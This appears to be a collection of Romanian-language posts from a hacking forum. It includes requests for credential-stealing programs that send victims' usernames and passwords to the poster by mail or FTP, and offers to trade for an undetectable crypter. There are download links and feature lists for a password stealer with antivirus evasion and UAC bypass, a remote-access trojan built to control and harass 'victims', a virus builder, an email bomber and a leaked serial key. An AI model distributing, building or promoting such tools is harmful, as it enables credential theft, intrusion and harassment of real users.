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  1. Exista vreun hack pentru jocu asta http://nostale.net/ ?
  2. Aici puteti invata cum sa va faceti server privat la majoritatea mmorpgurilor Sper sa va placa forumul este facut de mine Link: http://private-game.darkbb.com
  3. denys


    dau cont rapidshare pe un an pentru un crypter fud sau un cont de metin lvl 40+ cu iteme+9 care vrea sasi lase idu
  4. nu vreau cu keylogger fiind ca e detectat de antivirus vreau doar un program , nuj in ce limbaj sa fie facut. In care daca cineva scrie ceva iin cele 2 casute de la username si password sa mi le trimita mie pe mail sau ftp
  5. Am nevoie de un program in care daca cineva isi scrie id si parola sa mi le trimita mie pe ftp sau mail , va rog ajutatima
  6. Dispera lumea pe mess ,le va aparea celor din lista ta ca esti on apoi off si tot asa http://www.filebox.ro/down.php?key=dvqyqnuost618j3n
  7. Cu acest program puteti parola ori ce folder http://fisierulmeu.ro/18X0OMYBLSR7/Put-Folder-Password-by-Junior-rar.html
  8. Recovery: Miranda (Private Version only) Google Talk (Private Version only)(NEW) Firefox 2.xx - 3.xx IE6 IE7 - 8 Filezilla Smart FTP FlashFXP CoreFTP Trillian Pidgin and Gaim PaltalkScene Digsby Live Messenger MSN Messenger AIM 6.xx (Private Version only) NO-IP DynDNS Outlook CamFrog (NEW) Custom CD-Key Grabber (Input own path to key you want to grab) Icon Options: Replace Default Icon: Icon Hunter Main Features: Stub / Builder made in VB6 FUD Scantime + Runtime All strings are encrypted, all your inputted data, (PHP url) is encrypted, and all API's that can be encrypted/called dynamically are encrypted. No 3rd party applications used UAC Bypass output.exe = 96kb uncompressed, 37.7kb compressed(NEW) Send info via PHP (MySQL setup)(NEW) Output.exe requires NO dependencies. (Builder does though) (NEW) Ability to import FUD stubs Anti-Generic Sandbox Anti-Virtual PC, VMWare, VirtualBox Installation options (You get the option to pick where the file drops to / where in the registry to add the startup key.) Pick the dropped files attributes (Hidden, Read only, or System) Option to compress with UPX Scramble the UPX header Added File Version Info Cloner (NEW) Fake error message Change the Date of the outputted executable's date Increase the files size (Add NOP bytes to the file) Load and Save your sessions! Private Version All of the listed features above + a unique stub that no one else has. AIM 6.xx recovery Miranda recovery Google Talk recovery Melt Option on builder to delete, output.exe, icon. (save kbs) No set number of CD-Key Paths (You can add as many keys as you want grabbed) http://www.2shared.com/file/6987466/7aa082c2/Remote_Penetration_v21.html
  9. Client: Optiuni: -Start superss (face screen-shot`uri in windows la victima pana se umple HDD) -Write in R.T. (scrii in timp real la victima in pc) -Send Mail (primesti direct pe mail anumite date din PC`ul victimei) -Yahoo! Tools (schimbare status , schimbare caption , modificare anumite optiuni etc) -Counter-Strike (daca victima se joaca cs , ii puteti executa comenzi in consola si multe altele) -Start bad lag (face lag foarte mare la victima in pc) -Start button (puteti schimba captionu butonului start, ascunde etc) -Desktop img (schimba imaginea dp desktop) -Start Crazy M. (mouse`ul se v`a misca singur) -Lock keyboard (blocheaza mouse`ul si tastatura) -Download (downloadezi fisiere direct in pc`ul victimei) -Start crazy errors (apar multe erori pe ecran) -Play song (Porneste o anumita melodie. aceasta v`a canta intr`un media player din server fara ca victima sa vada) -Remote CMD (executi comenzi in cmd) -Fuck Desktop (desktop`ul victimei se v`a umple cu fisiere(exe,ini,jpg,bmp,txt) // Removed Name: c0smyn Serial: 48918928923
  10. Un program cu care poti sa faci virusi http://www.2shared.com/file/7539379/b0f1357a/JPSVM3.html
  11. Un simplu program de schimbat parola administratorului http://rapidshare.com/files/27913204/XPPass.rar
  12. Poza spune tot sper sa va placa http://www.2shared.com/file/10346244/abaadc2a/Email_bomber_by_Wolwerine_want.html
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